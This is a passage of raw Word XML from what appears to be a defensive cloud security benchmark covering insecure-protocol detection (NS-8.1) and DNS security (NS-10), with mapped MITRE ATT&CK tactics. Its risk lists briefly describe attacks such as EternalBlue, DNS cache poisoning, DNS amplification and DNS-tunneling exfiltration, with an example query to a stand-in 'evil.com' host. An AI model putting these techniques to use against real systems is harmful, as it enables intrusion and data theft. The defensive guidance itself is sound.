          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B67506">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SMBv1's unencrypted sessions and exploits (e.g., EternalBlue) enable malware propagation or credential relay across networ</w:t>
      </w:r>
      <w:r w:rsidR="00CF0AED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F9152" w14:textId="55720BA9" w:rsidR="00CF0AED" w:rsidRDefault="00CF0AED" w:rsidP="00CF0AED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0AED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90F3E1" w14:textId="1D326216" w:rsidR="00CF0AED" w:rsidRDefault="00CF0AED" w:rsidP="00CF0AED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0AED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6C096" w14:textId="0DFBAA23" w:rsidR="00CF0AED" w:rsidRDefault="00CF0AED" w:rsidP="00CF0AED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0AED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B096628" w14:textId="0D5647AD" w:rsidR="00CF0AED" w:rsidRDefault="00CF0AED" w:rsidP="00CF0AED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0AED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E89820" w14:textId="77777777" w:rsidR="00CB27F3" w:rsidRDefault="00CB27F3" w:rsidP="00CB27F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2CC7E1" w14:textId="77777777" w:rsidR="00CB27F3" w:rsidRPr="00CB27F3" w:rsidRDefault="00CB27F3" w:rsidP="00CB27F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4F26AC" w14:textId="0E3D7BD2" w:rsidR="00AE72FE" w:rsidRDefault="00AE72FE" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE72FE">
        <w:t>NS-8.1: Detect and disable insecure services and protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC74F9F" w14:textId="097036AC" w:rsidR="00AE72FE" w:rsidRDefault="00AE72FE" w:rsidP="00AE72FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE72FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Microsoft Sentinel's built-in Insecure Protocol Workbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C71BE2A" w14:textId="61F69456" w:rsidR="000B3AC0" w:rsidRDefault="000B3AC0" w:rsidP="000B3AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B3AC0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Discover insecure protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21941A" w14:textId="4C0E5E62" w:rsidR="000B3AC0" w:rsidRDefault="000B3AC0" w:rsidP="000B3AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B3AC0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use Microsoft Sentinel's Insecure Protocol Workbook to identify usage of SSL/TLSv1, SSHv1, SMBv1, LM/NTLMv1, wDigest, weak Kerberos ciphers, and unsigned LDAP binds across your environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4566E36C" w14:textId="23FCE9D5" w:rsidR="00657247" w:rsidRDefault="00657247" w:rsidP="00657247">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657247">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Disable insecure services and protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDC09CE" w14:textId="5598E898" w:rsidR="00657247" w:rsidRDefault="00657247" w:rsidP="00657247">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657247">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Disable identified insecure services and protocols that do not meet appropriate security standards to eliminate vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890F008" w14:textId="09E15A1B" w:rsidR="00FD4D10" w:rsidRDefault="00FD4D10" w:rsidP="00FD4D10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement compensating controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F3CC25" w14:textId="3E821F29" w:rsidR="00FD4D10" w:rsidRDefault="00FD4D10" w:rsidP="00FD4D10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>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61E51CCC" w14:textId="0935663D" w:rsidR="001072B1" w:rsidRDefault="001072B1" w:rsidP="00FB339D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc236841631"/>
      <w:r w:rsidRPr="001072B1">
        <w:t>NS-10: Ensure Domain Name System (DNS) security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="12A5CDF0" w14:textId="08733876" w:rsidR="00206C93" w:rsidRDefault="00206C93" w:rsidP="00206C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206C93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030B3C38" w14:textId="143C420B" w:rsidR="00744A93" w:rsidRDefault="00744A93" w:rsidP="00744A93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744A93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ensure that Domain Name System (DNS) security configuration protects against known risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4192DF" w14:textId="29BBC4F3" w:rsidR="00744A93" w:rsidRDefault="00744A93" w:rsidP="00744A93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744A93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use trusted authoritative and recursive DNS services across your cloud environment to ensure the client (such as operating systems and applications) receives the correct resolution result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E100165" w14:textId="0264F4A6" w:rsidR="00744A93" w:rsidRDefault="00744A93" w:rsidP="00744A93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744A93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Separate the public and private DNS resolution so the DNS resolution process for the private network can be isolated from the public network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306DA95" w14:textId="157E0CEE" w:rsidR="00F302F8" w:rsidRDefault="00F302F8" w:rsidP="00744A93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F302F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ensure your DNS security strategy also includes mitigations against common attacks, such as dangling DNS, DNS amplifications attacks, DNS poisoning and spoofing, and so on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF10309" w14:textId="160F216C" w:rsidR="00F302F8" w:rsidRDefault="00F302F8" w:rsidP="00F302F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F302F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidRPr="00F302F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC7E4A" w14:textId="77401EC0" w:rsidR="00F302F8" w:rsidRDefault="00F302F8" w:rsidP="00F302F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F302F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS spoofing/poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAD9F92" w14:textId="50F91341" w:rsidR="00B33538" w:rsidRPr="00CB27F3" w:rsidRDefault="0096565E" w:rsidP="00B33538">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB27F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Adversaries forge DNS responses or corrupt resolver caches (e.g., Kaminsky attack) to redirect clients to malicious servers, enabling phishing or data interception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D3CA34" w14:textId="01C3C0BB" w:rsidR="0096565E" w:rsidRDefault="0096565E" w:rsidP="0096565E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096565E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS amplification attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B376700" w14:textId="5D23C990" w:rsidR="00B33538" w:rsidRDefault="00B33538" w:rsidP="00B33538">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33538">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers exploit misconfigured DNS servers to amplify DDoS traffic (e.g., 60-byte query yielding 4,000-byte response), overwhelming target networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7871D56F" w14:textId="673E7FAE" w:rsidR="00B33538" w:rsidRDefault="00B33538" w:rsidP="00B33538">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33538">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dangling DNS exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028145AF" w14:textId="35F97F9B" w:rsidR="00C504B3" w:rsidRDefault="00C504B3" w:rsidP="00C504B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C504B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dangling records (e.g., stale CNAMEs) allow adversaries to hijack decommissioned resources, redirecting traffic to malicious endpoints for phishing or malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D15AB6" w14:textId="013C6C51" w:rsidR="00C504B3" w:rsidRDefault="00C504B3" w:rsidP="00C504B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C504B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Data exfiltration via DNS tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486E58E3" w14:textId="59A7DCBE" w:rsidR="00C504B3" w:rsidRDefault="00C504B3" w:rsidP="00C504B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C504B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Malicious actors encode data in DNS queries (e.g., data.exfil.evil.com) to covertly exfiltrate sensitive information, bypassing firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2FDF5" w14:textId="4EC2155A" w:rsidR="00EC1304" w:rsidRDefault="00EC1304" w:rsidP="00EC1304">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1304">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Phishing/malware delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752CBD4B" w14:textId="1BB949D9" w:rsidR="00457EF5" w:rsidRDefault="00457EF5" w:rsidP="00457EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457EF5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Compromised resolvers redirect legitimate domains to attacker-controlled IPs, delivering phishing pages or malware to unsuspecting clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6891214B" w14:textId="77777777" w:rsidR="00CB27F3" w:rsidRPr="00CB27F3" w:rsidRDefault="00CB27F3" w:rsidP="00CB27F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37606F6F" w14:textId="414F41FC" w:rsidR="00457EF5" w:rsidRDefault="00457EF5" w:rsidP="00457EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457EF5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B6AE5" w14:textId="3AC26985" w:rsidR="00457EF5" w:rsidRDefault="00457EF5" w:rsidP="00457EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457EF5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3111EE10" w14:textId="7B35ACE9" w:rsidR="005A2E4F" w:rsidRDefault="005A2E4F" w:rsidP="00457EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2E4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACD34DB" w14:textId="1E198696" w:rsidR="005A2E4F" w:rsidRDefault="005A2E4F" w:rsidP="00457EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2E4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E43C25" w14:textId="6AD6CEDF" w:rsidR="005A2E4F" w:rsidRDefault="005A2E4F" w:rsidP="00457EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2E4F">
        <w:rPr>
